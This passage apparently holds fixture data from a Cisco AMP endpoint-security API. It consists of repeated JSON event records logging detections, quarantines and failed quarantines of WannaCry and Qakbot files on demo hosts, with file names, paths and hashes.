disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat 